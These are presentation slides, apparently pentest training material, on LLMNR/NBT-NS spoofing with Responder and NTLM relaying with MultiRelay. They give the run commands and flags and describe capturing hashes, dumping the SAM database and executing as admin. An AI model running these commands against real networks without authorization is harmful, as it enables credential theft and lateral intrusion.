2. 2
Responder
Responder
A LLMNR & NBT-NS Spoofing Attack is a classic internal network attack that still works today,
due to low awareness and the fact it's enabled by default in Windows.
Responder is answering network requests with poisoned answers in the network for services
like http, https, wpad, ftp, smb and etc.., stilling the credentials of the users who try to
authenticate.
During the authentication process the client will send the rogue server a NTLMv2 hash for the
user that's trying to authenticate, this hash is captured and can be cracked offline with a tool
like Hashcat or John the Ripper or used in a pass-the-hash attack.
LLMNR and NBT-NS are enabled by default in Windows and with awareness of this attack being
fairly low you stand a good chance of being able to gather credentials on an internal penetration
test.
3. 3
Responder - Example
Responder - Example
Setup Responder with the command below:
Responder –I eth0 –wfF
Flags explanation:
-I = Network interface.
-w = WPAD rogue proxy server.
-f = fingerprint (Detect windows and services versions).
-F = Force WPAD Authenticate
4. 4
Responder - Example
Responder - Example
After we setup the responder all we have to do is wait for victim.
In our case the victim open the browser and WPAD server capture the user and hash.
The results are located at /usr/share/responder/logs.
6. 6
Multi Relay
Multi Relay Configuration
To use Multi-Relay function need to edit responder configuration file.
/etc/responder/responder.conf
Switch Off the SMB and HTTP Servers.
Run the responder with the command below:
Responder –I eth0 –wfF
Run the Multi-Relay with the command below: (location:
/usr/share/responder/tools)
Python Multi-Replay.py –t 192.168.1.141 –u ALL
Flags explanation:
-t = target
-u = User To Relay
Why to use Multi Relay?
• Multi Relay give you a solution by giving you access without cracking
the password hash.
• Multi Relay have Build-in tools like mimikatz.
• Extract the SAM database and print hashes.
• Upload files and run as admin.
7. 7
Multi Relay - Example
Multi Relay - Example
After we setup the responder and Multi Relay all we have to do is wait for victim (Must be Administrator).
In our case the victim open the SMB and authenticate the responder and Multi Relay capture the user and hash,
Login with the credentials